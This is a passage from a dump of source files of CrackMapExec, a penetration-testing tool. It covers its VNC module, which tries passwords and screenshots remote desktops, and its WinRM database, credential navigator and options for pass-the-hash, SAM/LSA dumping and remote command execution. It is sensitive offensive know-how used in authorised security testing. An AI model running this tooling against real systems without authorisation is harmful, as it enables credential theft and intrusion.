ConnectionResetError,\n ) as e:\n self.logger.fail(f\"{username}:{process_secret(password)} {e}\")\n self.client_close()\n return False\n except Exception as e:\n self.logger.exception(e)\n self.client_close()\n return False\n\n def execute(self, payload=None, output=False):\n try:\n command = payload if payload is not None else self.args.execute\n stdin, stdout, stderr = self.conn.exec_command(command)\n except AttributeError:\n return \"\"\n if output:\n self.logger.success(\"Executed command\")\n for line in stdout:\n self.logger.highlight(line.strip())\n return stdout\n" }, { "path": "cme/protocols/vnc/__init__.py", "content": "" }, { "path": "cme/protocols/vnc/database.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nfrom sqlalchemy import MetaData, Table\nfrom sqlalchemy.exc import (\n IllegalStateChangeError,\n NoInspectionAvailable,\n NoSuchTableError,\n)\nfrom sqlalchemy.orm import sessionmaker, scoped_session\nfrom sqlalchemy.exc import SAWarning\nimport warnings\nfrom cme.logger import cme_logger\n\n\n# if there is an issue with SQLAlchemy and a connection cannot be cleaned up properly it spews out annoying warnings\nwarnings.filterwarnings(\"ignore\", category=SAWarning)\n\n\nclass database:\n def __init__(self, db_engine):\n self.HostsTable = None\n self.CredentialsTable = None\n\n self.db_engine = db_engine\n self.db_path = self.db_engine.url.database\n self.protocol = Path(self.db_path).stem.upper()\n self.metadata = MetaData()\n self.reflect_tables()\n session_factory = sessionmaker(bind=self.db_engine, expire_on_commit=True)\n\n Session = scoped_session(session_factory)\n # this is still named \"conn\" when it is the session object; TODO: rename\n self.conn = Session()\n\n @staticmethod\n def db_schema(db_conn):\n db_conn.execute(\n \"\"\"CREATE TABLE \"credentials\" (\n \"id\" integer PRIMARY KEY,\n \"username\" text,\n \"password\" text,\n \"pkey\" text\n )\"\"\"\n )\n\n db_conn.execute(\n \"\"\"CREATE TABLE \"hosts\" (\n \"id\" integer PRIMARY KEY,\n \"ip\" text,\n \"hostname\" text,\n \"port\" integer,\n \"server_banner\" text\n )\"\"\"\n )\n\n def reflect_tables(self):\n with self.db_engine.connect() as conn:\n try:\n self.HostsTable = Table(\"hosts\", self.metadata, autoload_with=self.db_engine)\n self.CredentialsTable = Table(\"credentials\", self.metadata, autoload_with=self.db_engine)\n except (NoInspectionAvailable, NoSuchTableError):\n print(\n f\"\"\"\n [-] Error reflecting tables for the {self.protocol} protocol - this means there is a DB schema mismatch\n [-] This is probably because a newer version of CME is being ran on an old DB schema\n [-] Optionally save the old DB data (`cp {self.db_path} ~/cme_{self.protocol.lower()}.bak`)\n [-] Then remove the {self.protocol} DB (`rm -f {self.db_path}`) and run CME to initialize the new DB\"\"\"\n )\n exit()\n\n def shutdown_db(self):\n try:\n self.conn.close()\n # due to the async nature of CME, sometimes session state is a bit messy and this will throw:\n # Method 'close()' can't be called here; method '_connection_for_bind()' is already in progress and\n # this would cause an unexpected state change to \n except IllegalStateChangeError as e:\n cme_logger.debug(f\"Error while closing session db object: {e}\")\n\n def clear_database(self):\n for table in self.metadata.sorted_tables:\n self.conn.execute(table.delete())\n" }, { "path": "cme/protocols/vnc/db_navigator.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.cmedb import DatabaseNavigator, print_help\n\n\nclass navigator(DatabaseNavigator):\n def do_clear_database(self, line):\n if input(\"This will destroy all data in the current database, are you SURE you want to run this? (y/n): \") == \"y\":\n self.db.clear_database()\n\n def help_clear_database(self):\n help_string = \"\"\"\n clear_database\n THIS COMPLETELY DESTROYS ALL DATA IN THE CURRENTLY CONNECTED DATABASE\n YOU CANNOT UNDO THIS COMMAND\n \"\"\"\n print_help(help_string)\n" }, { "path": "cme/protocols/vnc/proto_args.py", "content": "def proto_args(parser, std_parser, module_parser):\n vnc_parser = parser.add_parser(\"vnc\", help=\"own stuff using VNC\", parents=[std_parser, module_parser])\n vnc_parser.add_argument(\"--port\", type=int, default=5900, help=\"Custom VNC port\")\n vnc_parser.add_argument(\"--vnc-sleep\", type=int, default=5, help=\"VNC Sleep on socket connection to avoid rate limit\")\n\n egroup = vnc_parser.add_argument_group(\"Screenshot\", \"VNC Server\")\n egroup.add_argument(\"--screenshot\", action=\"store_true\", help=\"Screenshot VNC if connection success\")\n egroup.add_argument(\"--screentime\", type=int, default=5, help=\"Time to wait for desktop image\")\n\n return parser\n" }, { "path": "cme/protocols/vnc.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport asyncio\nimport os\nfrom datetime import datetime\n\nfrom aardwolf.commons.target import RDPTarget\n\nfrom cme.connection import *\nfrom cme.helpers.logger import highlight\nfrom cme.logger import CMEAdapter\nfrom aardwolf.vncconnection import VNCConnection\nfrom aardwolf.commons.iosettings import RDPIOSettings\nfrom aardwolf.commons.queuedata.constants import VIDEO_FORMAT\nfrom asyauth.common.credentials import UniCredential\nfrom asyauth.common.constants import asyauthSecret, asyauthProtocol\n\n\nclass vnc(connection):\n def __init__(self, args, db, host):\n self.iosettings = RDPIOSettings()\n self.iosettings.channels = []\n self.iosettings.video_out_format = VIDEO_FORMAT.RAW\n self.iosettings.clipboard_use_pyperclip = False\n self.url = None\n self.target = None\n self.credential = None\n connection.__init__(self, args, db, host)\n\n def proto_flow(self):\n self.proto_logger()\n if self.create_conn_obj():\n self.print_host_info()\n if self.login():\n if hasattr(self.args, \"module\") and self.args.module:\n self.call_modules()\n else:\n self.call_cmd_args()\n\n def proto_logger(self):\n self.logger = CMEAdapter(\n extra={\n \"protocol\": \"VNC\",\n \"host\": self.host,\n \"port\": self.args.port,\n \"hostname\": self.hostname,\n }\n )\n\n def print_host_info(self):\n self.logger.display(f\"VNC connecting to {self.hostname}\")\n\n def create_conn_obj(self):\n try:\n self.target = RDPTarget(ip=self.host, port=self.args.port)\n credential = UniCredential(protocol=asyauthProtocol.PLAIN, stype=asyauthSecret.NONE)\n self.conn = VNCConnection(target=self.target, credentials=credential, iosettings=self.iosettings)\n asyncio.run(self.connect_vnc(True))\n except Exception as e:\n self.logger.debug(str(e))\n if \"Server supports:\" not in str(e):\n return False\n return True\n\n async def connect_vnc(self, discover=False):\n _, err = await self.conn.connect()\n if err is not None:\n if not discover:\n await asyncio.sleep(self.args.vnc_sleep)\n raise err\n return True\n\n def plaintext_login(self, username, password):\n try:\n stype = asyauthSecret.PASS\n if password == \"\":\n stype = asyauthSecret.NONE\n self.credential = UniCredential(secret=password, protocol=asyauthProtocol.PLAIN, stype=stype)\n self.conn = VNCConnection(\n target=self.target,\n credentials=self.credential,\n iosettings=self.iosettings,\n )\n asyncio.run(self.connect_vnc())\n\n self.admin_privs = True\n self.logger.success(\n \"{} {}\".format(\n password,\n highlight(f\"({self.config.get('CME', 'pwn3d_label')})\" if self.admin_privs else \"\"),\n )\n )\n return True\n\n except Exception as e:\n self.logger.debug(str(e))\n if \"Server supports: 1\" in str(e):\n self.logger.success(\n \"{} {}\".format(\n \"No password seems to be accepted by the server\",\n highlight(f\"({self.config.get('CME', 'pwn3d_label')})\" if self.admin_privs else \"\"),\n )\n )\n else:\n self.logger.fail(f\"{password} {'Authentication failed'}\")\n return False\n\n async def screen(self):\n self.conn = VNCConnection(target=self.target, credentials=self.credential, iosettings=self.iosettings)\n await self.connect_vnc()\n await asyncio.sleep(int(self.args.screentime))\n if self.conn is not None and self.conn.desktop_buffer_has_data is True:\n buffer = self.conn.get_desktop_buffer(VIDEO_FORMAT.PIL)\n filename = os.path.expanduser(f\"~/.cme/screenshots/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.png\")\n buffer.save(filename, \"png\")\n self.logger.highlight(f\"Screenshot saved {filename}\")\n\n def screenshot(self):\n asyncio.run(self.screen())\n" }, { "path": "cme/protocols/winrm/__init__.py", "content": "" }, { "path": "cme/protocols/winrm/database.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nfrom sqlalchemy.dialects.sqlite import Insert\nfrom sqlalchemy.orm import sessionmaker, scoped_session\nfrom sqlalchemy import MetaData, Table, select, func, delete\nfrom sqlalchemy.exc import (\n IllegalStateChangeError,\n NoInspectionAvailable,\n NoSuchTableError,\n)\nfrom cme.logger import cme_logger\n\n\nclass database:\n def __init__(self, db_engine):\n self.HostsTable = None\n self.UsersTable = None\n self.AdminRelationsTable = None\n self.LoggedinRelationsTable = None\n\n self.db_engine = db_engine\n self.db_path = self.db_engine.url.database\n self.protocol = Path(self.db_path).stem.upper()\n self.metadata = MetaData()\n self.reflect_tables()\n session_factory = sessionmaker(bind=self.db_engine, expire_on_commit=True)\n\n Session = scoped_session(session_factory)\n # this is still named \"conn\" when it is the session object; TODO: rename\n self.conn = Session()\n\n @staticmethod\n def db_schema(db_conn):\n db_conn.execute(\n \"\"\"CREATE TABLE \"hosts\" (\n \"id\" integer PRIMARY KEY,\n \"ip\" text,\n \"port\" integer,\n \"hostname\" text,\n \"domain\" text,\n \"os\" text\n )\"\"\"\n )\n db_conn.execute(\n \"\"\"CREATE TABLE \"users\" (\n \"id\" integer PRIMARY KEY,\n \"domain\" text,\n \"username\" text,\n \"password\" text,\n \"credtype\" text,\n \"pillaged_from_hostid\" integer,\n FOREIGN KEY(pillaged_from_hostid) REFERENCES hosts(id)\n )\"\"\"\n )\n db_conn.execute(\n \"\"\"CREATE TABLE \"admin_relations\" (\n \"id\" integer PRIMARY KEY,\n \"userid\" integer,\n \"hostid\" integer,\n FOREIGN KEY(userid) REFERENCES users(id),\n FOREIGN KEY(hostid) REFERENCES hosts(id)\n )\"\"\"\n )\n db_conn.execute(\n \"\"\"CREATE TABLE \"loggedin_relations\" (\n \"id\" integer PRIMARY KEY,\n \"userid\" integer,\n \"hostid\" integer,\n FOREIGN KEY(userid) REFERENCES users(id),\n FOREIGN KEY(hostid) REFERENCES hosts(id)\n )\"\"\"\n )\n\n def reflect_tables(self):\n with self.db_engine.connect() as conn:\n try:\n self.HostsTable = Table(\"hosts\", self.metadata, autoload_with=self.db_engine)\n self.UsersTable = Table(\"users\", self.metadata, autoload_with=self.db_engine)\n self.AdminRelationsTable = Table(\"admin_relations\", self.metadata, autoload_with=self.db_engine)\n self.LoggedinRelationsTable = Table(\"loggedin_relations\", self.metadata, autoload_with=self.db_engine)\n except (NoInspectionAvailable, NoSuchTableError):\n print(\n f\"\"\"\n [-] Error reflecting tables for the {self.protocol} protocol - this means there is a DB schema mismatch\n [-] This is probably because a newer version of CME is being ran on an old DB schema\n [-] Optionally save the old DB data (`cp {self.db_path} ~/cme_{self.protocol.lower()}.bak`)\n [-] Then remove the {self.protocol} DB (`rm -f {self.db_path}`) and run CME to initialize the new DB\"\"\"\n )\n exit()\n\n def shutdown_db(self):\n try:\n self.conn.close()\n # due to the async nature of CME, sometimes session state is a bit messy and this will throw:\n # Method 'close()' can't be called here; method '_connection_for_bind()' is already in progress and\n # this would cause an unexpected state change to \n except IllegalStateChangeError as e:\n cme_logger.debug(f\"Error while closing session db object: {e}\")\n\n def clear_database(self):\n for table in self.metadata.sorted_tables:\n self.conn.execute(table.delete())\n\n def add_host(self, ip, port, hostname, domain, os=None):\n \"\"\"\n Check if this host has already been added to the database, if not, add it in.\n TODO: return inserted or updated row ids as a list\n \"\"\"\n domain = domain.split(\".\")[0].upper()\n hosts = []\n\n q = select(self.HostsTable).filter(self.HostsTable.c.ip == ip)\n results = self.conn.execute(q).all()\n cme_logger.debug(f\"smb add_host() - hosts returned: {results}\")\n\n # create new host\n if not results:\n new_host = {\n \"ip\": ip,\n \"port\": port,\n \"hostname\": hostname,\n \"domain\": domain,\n \"os\": os,\n }\n hosts = [new_host]\n # update existing hosts data\n else:\n for host in results:\n host_data = host._asdict()\n # only update column if it is being passed in\n if ip is not None:\n host_data[\"ip\"] = ip\n if port is not None:\n host_data[\"port\"] = port\n if hostname is not None:\n host_data[\"hostname\"] = hostname\n if domain is not None:\n host_data[\"domain\"] = domain\n if os is not None:\n host_data[\"os\"] = os\n # only add host to be updated if it has changed\n if host_data not in hosts:\n hosts.append(host_data)\n cme_logger.debug(f\"Update Hosts: {hosts}\")\n\n # TODO: find a way to abstract this away to a single Upsert call\n q = Insert(self.HostsTable)\n update_columns = {col.name: col for col in q.excluded if col.name not in \"id\"}\n q = q.on_conflict_do_update(index_elements=self.HostsTable.primary_key, set_=update_columns)\n self.conn.execute(q, hosts)\n\n def add_credential(self, credtype, domain, username, password, pillaged_from=None):\n \"\"\"\n Check if this credential has already been added to the database, if not add it in.\n \"\"\"\n domain = domain.split(\".\")[0].upper()\n credentials = []\n\n credential_data = {}\n if credtype is not None:\n credential_data[\"credtype\"] = credtype\n if domain is not None:\n credential_data[\"domain\"] = domain\n if username is not None:\n credential_data[\"username\"] = username\n if password is not None:\n credential_data[\"password\"] = password\n if pillaged_from is not None:\n credential_data[\"pillaged_from\"] = pillaged_from\n\n q = select(self.UsersTable).filter(\n func.lower(self.UsersTable.c.domain) == func.lower(domain),\n func.lower(self.UsersTable.c.username) == func.lower(username),\n func.lower(self.UsersTable.c.credtype) == func.lower(credtype),\n )\n results = self.conn.execute(q).all()\n\n # add new credential\n if not results:\n new_cred = {\n \"credtype\": credtype,\n \"domain\": domain,\n \"username\": username,\n \"password\": password,\n \"pillaged_from\": pillaged_from,\n }\n credentials = [new_cred]\n # update existing cred data\n else:\n for creds in results:\n # this will include the id, so we don't touch it\n cred_data = creds._asdict()\n # only update column if it is being passed in\n if credtype is not None:\n cred_data[\"credtype\"] = credtype\n if domain is not None:\n cred_data[\"domain\"] = domain\n if username is not None:\n cred_data[\"username\"] = username\n if password is not None:\n cred_data[\"password\"] = password\n if pillaged_from is not None:\n cred_data[\"pillaged_from\"] = pillaged_from\n # only add cred to be updated if it has changed\n if cred_data not in credentials:\n credentials.append(cred_data)\n\n # TODO: find a way to abstract this away to a single Upsert call\n q_users = Insert(self.UsersTable) # .returning(self.UsersTable.c.id)\n update_columns_users = {col.name: col for col in q_users.excluded if col.name not in \"id\"}\n q_users = q_users.on_conflict_do_update(index_elements=self.UsersTable.primary_key, set_=update_columns_users)\n self.conn.execute(q_users, credentials) # .scalar()\n # return user_ids\n\n def remove_credentials(self, creds_id):\n \"\"\"\n Removes a credential ID from the database\n \"\"\"\n del_hosts = []\n for cred_id in creds_id:\n q = delete(self.UsersTable).filter(self.UsersTable.c.id == cred_id)\n del_hosts.append(q)\n self.conn.execute(q)\n\n def add_admin_user(self, credtype, domain, username, password, host, user_id=None):\n domain = domain.split(\".\")[0]\n add_links = []\n\n creds_q = select(self.UsersTable)\n if user_id:\n creds_q = creds_q.filter(self.UsersTable.c.id == user_id)\n else:\n creds_q = creds_q.filter(\n func.lower(self.UsersTable.c.credtype) == func.lower(credtype),\n func.lower(self.UsersTable.c.domain) == func.lower(domain),\n func.lower(self.UsersTable.c.username) == func.lower(username),\n self.UsersTable.c.password == password,\n )\n users = self.conn.execute(creds_q)\n hosts = self.get_hosts(host)\n\n if users and hosts:\n for user, host in zip(users, hosts):\n user_id = user[0]\n host_id = host[0]\n link = {\"userid\": user_id, \"hostid\": host_id}\n admin_relations_select = select(self.AdminRelationsTable).filter(\n self.AdminRelationsTable.c.userid == user_id,\n self.AdminRelationsTable.c.hostid == host_id,\n )\n links = self.conn.execute(admin_relations_select).all()\n\n if not links:\n add_links.append(link)\n\n admin_relations_insert = Insert(self.AdminRelationsTable)\n\n self.conn.execute(admin_relations_insert, add_links)\n\n def get_admin_relations(self, user_id=None, host_id=None):\n if user_id:\n q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.userid == user_id)\n elif host_id:\n q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.hostid == host_id)\n else:\n q = select(self.AdminRelationsTable)\n\n results = self.conn.execute(q).all()\n return results\n\n def remove_admin_relation(self, user_ids=None, host_ids=None):\n q = delete(self.AdminRelationsTable)\n if user_ids:\n for user_id in user_ids:\n q = q.filter(self.AdminRelationsTable.c.userid == user_id)\n elif host_ids:\n for host_id in host_ids:\n q = q.filter(self.AdminRelationsTable.c.hostid == host_id)\n self.conn.execute(q)\n\n def is_credential_valid(self, credential_id):\n \"\"\"\n Check if this credential ID is valid.\n \"\"\"\n q = select(self.UsersTable).filter(\n self.UsersTable.c.id == credential_id,\n self.UsersTable.c.password is not None,\n )\n results = self.conn.execute(q).all()\n return len(results) > 0\n\n def get_credentials(self, filter_term=None, cred_type=None):\n \"\"\"\n Return credentials from the database.\n \"\"\"\n # if we're returning a single credential by ID\n if self.is_credential_valid(filter_term):\n q = select(self.UsersTable).filter(self.UsersTable.c.id == filter_term)\n elif cred_type:\n q = select(self.UsersTable).filter(self.UsersTable.c.credtype == cred_type)\n # if we're filtering by username\n elif filter_term and filter_term != \"\":\n like_term = func.lower(f\"%{filter_term}%\")\n q = select(self.UsersTable).filter(func.lower(self.UsersTable.c.username).like(like_term))\n # otherwise return all credentials\n else:\n q = select(self.UsersTable)\n\n results = self.conn.execute(q).all()\n return results\n\n def is_credential_local(self, credential_id):\n q = select(self.UsersTable.c.domain).filter(self.UsersTable.c.id == credential_id)\n user_domain = self.conn.execute(q).all()\n\n if user_domain:\n q = select(self.HostsTable).filter(func.lower(self.HostsTable.c.id) == func.lower(user_domain))\n results = self.conn.execute(q).all()\n\n return len(results) > 0\n\n def is_host_valid(self, host_id):\n \"\"\"\n Check if this host ID is valid.\n \"\"\"\n q = select(self.HostsTable).filter(self.HostsTable.c.id == host_id)\n results = self.conn.execute(q).all()\n return len(results) > 0\n\n def get_hosts(self, filter_term=None):\n \"\"\"\n Return hosts from the database.\n \"\"\"\n q = select(self.HostsTable)\n\n # if we're returning a single host by ID\n if self.is_host_valid(filter_term):\n q = q.filter(self.HostsTable.c.id == filter_term)\n results = self.conn.execute(q).first()\n # all() returns a list, so we keep the return format the same so consumers don't have to guess\n return [results]\n # if we're filtering by domain controllers\n elif filter_term is not None and filter_term.startswith(\"domain\"):\n domain = filter_term.split()[1]\n like_term = func.lower(f\"%{domain}%\")\n q = q.filter(self.HostsTable.c.domain.like(like_term))\n # if we're filtering by ip/hostname\n elif filter_term and filter_term != \"\":\n like_term = func.lower(f\"%{filter_term}%\")\n q = q.filter(self.HostsTable.c.ip.like(like_term) | func.lower(self.HostsTable.c.hostname).like(like_term))\n results = self.conn.execute(q).all()\n cme_logger.debug(f\"winrm get_hosts() - results: {results}\")\n return results\n\n def is_user_valid(self, user_id):\n \"\"\"\n Check if this User ID is valid.\n \"\"\"\n q = select(self.UsersTable).filter(self.UsersTable.c.id == user_id)\n results = self.conn.execute(q).all()\n return len(results) > 0\n\n def get_users(self, filter_term=None):\n q = select(self.UsersTable)\n\n if self.is_user_valid(filter_term):\n q = q.filter(self.UsersTable.c.id == filter_term)\n # if we're filtering by username\n elif filter_term and filter_term != \"\":\n like_term = func.lower(f\"%{filter_term}%\")\n q = q.filter(func.lower(self.UsersTable.c.username).like(like_term))\n results = self.conn.execute(q).all()\n return results\n\n def get_user(self, domain, username):\n q = select(self.UsersTable).filter(\n func.lower(self.UsersTable.c.domain) == func.lower(domain),\n func.lower(self.UsersTable.c.username) == func.lower(username),\n )\n results = self.conn.execute(q).all()\n return results\n\n def add_loggedin_relation(self, user_id, host_id):\n relation_query = select(self.LoggedinRelationsTable).filter(\n self.LoggedinRelationsTable.c.userid == user_id,\n self.LoggedinRelationsTable.c.hostid == host_id,\n )\n results = self.conn.execute(relation_query).all()\n\n # only add one if one doesn't already exist\n if not results:\n relation = {\"userid\": user_id, \"hostid\": host_id}\n try:\n # TODO: find a way to abstract this away to a single Upsert call\n q = Insert(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id)\n\n self.conn.execute(q, [relation]) # .scalar()\n # return inserted_ids\n except Exception as e:\n cme_logger.debug(f\"Error inserting LoggedinRelation: {e}\")\n\n def get_loggedin_relations(self, user_id=None, host_id=None):\n q = select(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id)\n if user_id:\n q = q.filter(self.LoggedinRelationsTable.c.userid == user_id)\n if host_id:\n q = q.filter(self.LoggedinRelationsTable.c.hostid == host_id)\n results = self.conn.execute(q).all()\n return results\n\n def remove_loggedin_relations(self, user_id=None, host_id=None):\n q = delete(self.LoggedinRelationsTable)\n if user_id:\n q = q.filter(self.LoggedinRelationsTable.c.userid == user_id)\n elif host_id:\n q = q.filter(self.LoggedinRelationsTable.c.hostid == host_id)\n self.conn.execute(q)\n" }, { "path": "cme/protocols/winrm/db_navigator.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.cmedb import DatabaseNavigator, print_help, print_table\nfrom cme.helpers.misc import validate_ntlm\n\n\nclass navigator(DatabaseNavigator):\n def display_creds(self, creds):\n data = [[\"CredID\", \"Admin On\", \"CredType\", \"Domain\", \"UserName\", \"Password\"]]\n\n for cred in creds:\n cred_id = cred[0]\n domain = cred[1]\n username = cred[2]\n password = cred[3]\n credtype = cred[4]\n # pillaged_from = cred[5]\n\n links = self.db.get_admin_relations(user_id=cred_id)\n data.append(\n [\n cred_id,\n str(len(links)) + \" Host(s)\",\n credtype,\n domain,\n username,\n password,\n ]\n )\n print_table(data, title=\"Credentials\")\n\n def display_hosts(self, hosts):\n data = [[\"HostID\", \"Admins\", \"IP\", \"Port\", \"Hostname\", \"Domain\", \"OS\"]]\n\n for host in hosts:\n host_id = host[0]\n ip = host[1]\n port = host[2]\n hostname = host[3]\n domain = host[4]\n\n try:\n os = host[5].decode()\n except:\n os = host[5]\n\n links = self.db.get_admin_relations(host_id=host_id)\n data.append(\n [\n host_id,\n str(len(links)) + \" Cred(s)\",\n ip,\n port,\n hostname,\n domain,\n os,\n ]\n )\n print_table(data, title=\"Hosts\")\n\n def do_hosts(self, line):\n filter_term = line.strip()\n\n if filter_term == \"\":\n hosts = self.db.get_hosts()\n self.display_hosts(hosts)\n else:\n hosts = self.db.get_hosts(filter_term=filter_term)\n\n if len(hosts) > 1:\n self.display_hosts(hosts)\n elif len(hosts) == 1:\n data = [[\"HostID\", \"IP\", \"Port\", \"Hostname\", \"Domain\", \"OS\"]]\n host_id_list = []\n\n for host in hosts:\n host_id = host[0]\n host_id_list.append(host_id)\n ip = host[1]\n port = host[2]\n hostname = host[3]\n domain = host[4]\n\n try:\n os = host[5].decode()\n except:\n os = host[5]\n\n data.append([host_id, ip, port, hostname, domain, os])\n print_table(data, title=\"Host\")\n\n data = [[\"CredID\", \"CredType\", \"Domain\", \"UserName\", \"Password\"]]\n for host_id in host_id_list:\n links = self.db.get_admin_relations(host_id=host_id)\n\n for link in links:\n link_id, cred_id, host_id = link\n creds = self.db.get_credentials(filter_term=cred_id)\n\n for cred in creds:\n cred_id = cred[0]\n domain = cred[1]\n username = cred[2]\n password = cred[3]\n credtype = cred[4]\n # pillaged_from = cred[5]\n data.append([cred_id, credtype, domain, username, password])\n print_table(data, title=\"Credential(s) with Admin Access\")\n\n def help_hosts(self):\n help_string = \"\"\"\n hosts [filter_term]\n By default prints all hosts\n Table format:\n | 'HostID', 'IP', 'Port', 'Hostname', 'Domain', 'OS' |\n Subcommands:\n filter_term - filters hosts with filter_term\n If a single host is returned (e.g. `hosts 15`, it prints the following tables:\n Host | 'HostID', 'IP', 'Hostname', 'Domain', 'OS', 'DC', 'SMBv1', 'Signing', 'Spooler', 'Zerologon', 'PetitPotam' |\n Credential(s) with Admin Access | 'CredID', 'CredType', 'Domain', 'UserName', 'Password' |\n Otherwise, it prints the default host table from a `like` query on the `ip` and `hostname` columns\n \"\"\"\n print_help(help_string)\n\n def do_creds(self, line):\n filter_term = line.strip()\n\n if filter_term == \"\":\n creds = self.db.get_credentials()\n self.display_creds(creds)\n elif filter_term.split()[0].lower() == \"add\":\n # add format: \"domain username password \n args = filter_term.split()[1:]\n\n if len(args) == 3:\n domain, username, password = args\n if validate_ntlm(password):\n self.db.add_credential(\"hash\", domain, username, password)\n else:\n self.db.add_credential(\"plaintext\", domain, username, password)\n else:\n print(\"[!] Format is 'add domain username password\")\n return\n elif filter_term.split()[0].lower() == \"remove\":\n args = filter_term.split()[1:]\n if len(args) != 1:\n print(\"[!] Format is 'remove '\")\n return\n else:\n self.db.remove_credentials(args)\n self.db.remove_admin_relation(user_ids=args)\n elif filter_term.split()[0].lower() == \"plaintext\":\n creds = self.db.get_credentials(cred_type=\"plaintext\")\n self.display_creds(creds)\n elif filter_term.split()[0].lower() == \"hash\":\n creds = self.db.get_credentials(cred_type=\"hash\")\n self.display_creds(creds)\n else:\n creds = self.db.get_credentials(filter_term=filter_term)\n if len(creds) != 1:\n self.display_creds(creds)\n elif len(creds) == 1:\n data = [\n [\n \"CredID\",\n \"CredType\",\n \"Pillaged From HostID\",\n \"Domain\",\n \"UserName\",\n \"Password\",\n ]\n ]\n cred_id_list = []\n\n for cred in creds:\n cred_id = cred[0]\n cred_id_list.append(cred_id)\n domain = cred[1]\n username = cred[2]\n password = cred[3]\n credtype = cred[4]\n pillaged_from = cred[5]\n\n data.append([cred_id, credtype, pillaged_from, domain, username, password])\n print_table(data, title=\"Credential(s)\")\n\n data = [[\"HostID\", \"IP\", \"Hostname\", \"Domain\", \"OS\"]]\n for cred_id in cred_id_list:\n links = self.db.get_admin_relations(user_id=cred_id)\n\n for link in links:\n link_id, cred_id, host_id = link\n hosts = self.db.get_hosts(host_id)\n\n for host in hosts:\n host_id = host[0]\n ip = host[1]\n hostname = host[2]\n domain = host[3]\n os = host[4]\n\n data.append([host_id, ip, hostname, domain, os])\n print_table(data, title=\"Admin Access to Host(s)\")\n\n def help_creds(self):\n help_string = \"\"\"\n creds [add|remove|plaintext|hash|filter_term]\n By default prints all creds\n Table format:\n | 'CredID', 'Admin On', 'CredType', 'Domain', 'UserName', 'Password' |\n Subcommands:\n add - format: \"add domain username password \"\n remove - format: \"remove \"\n plaintext - prints plaintext creds\n hash - prints hashed creds\n filter_term - filters creds with filter_term\n If a single credential is returned (e.g. `creds 15`, it prints the following tables:\n Credential(s) | 'CredID', 'CredType', 'Pillaged From HostID', 'Domain', 'UserName', 'Password' |\n Member of Group(s) | 'GroupID', 'Domain', 'Name' |\n Admin Access to Host(s) | 'HostID', 'IP', 'Hostname', 'Domain', 'OS'\n Otherwise, it prints the default credential table from a `like` query on the `username` column\n \"\"\"\n print_help(help_string)\n\n def do_clear_database(self, line):\n if input(\"This will destroy all data in the current database, are you SURE you want to run this? (y/n): \") == \"y\":\n self.db.clear_database()\n\n def help_clear_database(self):\n help_string = \"\"\"\n clear_database\n THIS COMPLETELY DESTROYS ALL DATA IN THE CURRENTLY CONNECTED DATABASE\n YOU CANNOT UNDO THIS COMMAND\n \"\"\"\n print_help(help_string)\n" }, { "path": "cme/protocols/winrm/proto_args.py", "content": "from argparse import _StoreTrueAction\n\ndef proto_args(parser, std_parser, module_parser):\n winrm_parser = parser.add_parser(\"winrm\", help=\"own stuff using WINRM\", parents=[std_parser, module_parser])\n winrm_parser.add_argument(\"-H\", \"--hash\", metavar=\"HASH\", dest=\"hash\", nargs=\"+\", default=[], help=\"NTLM hash(es) or file(s) containing NTLM hashes\")\n winrm_parser.add_argument(\"--port\", type=int, default=0, help=\"Custom WinRM port\")\n winrm_parser.add_argument(\"--ssl\", action=\"store_true\", help=\"Connect to SSL Enabled WINRM\")\n winrm_parser.add_argument(\"--ignore-ssl-cert\", action=\"store_true\", help=\"Ignore Certificate Verification\")\n winrm_parser.add_argument(\"--laps\", dest=\"laps\", metavar=\"LAPS\", type=str, help=\"LAPS authentification\", nargs=\"?\", const=\"administrator\")\n winrm_parser.add_argument(\"--http-timeout\", dest=\"http_timeout\", type=int, default=10, help=\"HTTP timeout for WinRM connections\")\n no_smb_arg = winrm_parser.add_argument(\"--no-smb\", action=get_conditional_action(_StoreTrueAction), make_required=[], help='No smb connection')\n\n dgroup = winrm_parser.add_mutually_exclusive_group()\n domain_arg = dgroup.add_argument(\"-d\", metavar=\"DOMAIN\", dest=\"domain\", type=str, default=None, help=\"domain to authenticate to\")\n dgroup.add_argument(\"--local-auth\", action=\"store_true\", help=\"authenticate locally to each target\")\n no_smb_arg.make_required = [domain_arg]\n\n cgroup = winrm_parser.add_argument_group(\"Credential Gathering\", \"Options for gathering credentials\")\n cegroup = cgroup.add_mutually_exclusive_group()\n cegroup.add_argument(\"--sam\", action=\"store_true\", help=\"dump SAM hashes from target systems\")\n cegroup.add_argument(\"--lsa\", action=\"store_true\", help=\"dump LSA secrets from target systems\")\n\n cgroup = winrm_parser.add_argument_group(\"Command Execution\", \"Options for executing commands\")\n cgroup.add_argument(\"--codec\", default=\"utf-8\",\n help=\"Set encoding used (codec) from the target's output (default \"\n \"\\\"utf-8\\\"). If errors are detected, run chcp.com at the target, \"\n \"map the result with \"\n \"https://docs.python.org/3/library/codecs.html#standard-encodings and then execute \"\n \"again with --codec and the corresponding codec\")\n cgroup.add_argument(\"--no-output\", action=\"store_true\", help=\"do not retrieve command output\")\n cgroup.add_argument(\"-x\", metavar=\"COMMAND\", dest=\"execute\", help=\"execute the specified command\")\n cgroup.add_argument(\"-X\", metavar=\"PS_COMMAND\", dest=\"ps_execute\", help=\"execute the specified PowerShell command\")\n\n return parser\n\ndef get_conditional_action(baseAction):\n class ConditionalAction(baseAction):\n def __init__(self, option_strings, dest, **kwargs):\n x = kwargs.pop('make_required', [])\n super(ConditionalAction, self).__init__(option_strings, dest, **kwargs)\n self.make_required = x\n\n def __call__(self, parser, namespace, values, option_string=None):\n for x in self.make_required:\n x.required = True\n super(ConditionalAction, self).__call__(parser, namespace, values, option_string)\n\n return ConditionalAction" }, { "path": "cme/protocols/winrm.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport binascii\nimport hashlib\nimport os\nimport requests\n\nfrom io import StringIO\nfrom datetime import datetime\nfrom pypsrp.client import 